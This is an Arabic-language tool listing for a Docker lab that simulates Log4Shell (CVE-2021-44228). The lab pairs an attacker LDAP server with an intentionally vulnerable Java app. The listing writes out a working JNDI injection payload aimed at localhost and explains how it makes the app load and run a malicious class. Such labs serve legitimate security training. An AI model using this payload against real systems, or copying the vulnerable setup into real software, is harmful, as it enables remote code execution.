CVE-2021-44228_dockernize — بيئة مختبرية معزولة عبر Docker لممارسة استغلال ثغرة CVE-2021-44228 (Log4Shell) بأمان. تتضمن خادم LDAP خاص بالمهاجم وتطبيق Java قابل للاستغلال لاختبار الحمولات المخصصة. | Kitploit
qw3rtyou/cve-2021-44228_dockernizeCVE-2021-44228_dockernize
بيئة مختبرية معزولة عبر Docker لممارسة استغلال ثغرة CVE-2021-44228 (Log4Shell) بأمان. تتضمن خادم LDAP خاص بالمهاجم وتطبيق Java قابل للاستغلال لاختبار الحمولات المخصصة.
اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.
11منذ سنة واحدة
بيئة مختبر ثغرة CVE-2021-44228 (Log4Shell)
مقدمة
يوفر هذا المشروع بيئة معزولة باستخدام Docker لممارسة وفهم ثغرة Log4j الحرجة المعروفة باسم CVE-2021-44228 (Log4Shell) بأمان.
الميزات الرئيسية
- بيئة اختبار آمنة ومعزولة باستخدام Docker
- إمكانية اختبار حمولات مخصصة
- تتضمن خادم LDAP الخاص بالمهاجم وتطبيق Java الضعيف
البدء
docker compose up --build
اختبار الحمولة
- يمكنك تعديل الحمولة في قسم الاختبار داخل
/vulnerable/Makefile
- الحمولة الافتراضية تستخدم
$${jndi:ldap://127.0.0.1:10000/}
كيف يعمل
- يبدأ تشغيل تطبيق Java الضعيف
يستمع خادم LDAP الخاص بالمهاجم على المنفذ 10000يعمل التطبيق الضعيفيتم تسجيل حمولة Log4Shell في التطبيق الضعيف عبر قسم الاختبار في ملف Makefileيحاول التطبيق الضعيف إجراء بحث JNDI عبر LDAPيعيد خادم LDAP فئة Java خبيثةيقوم التطبيق الضعيف بتحميل هذه الفئة وتنفيذها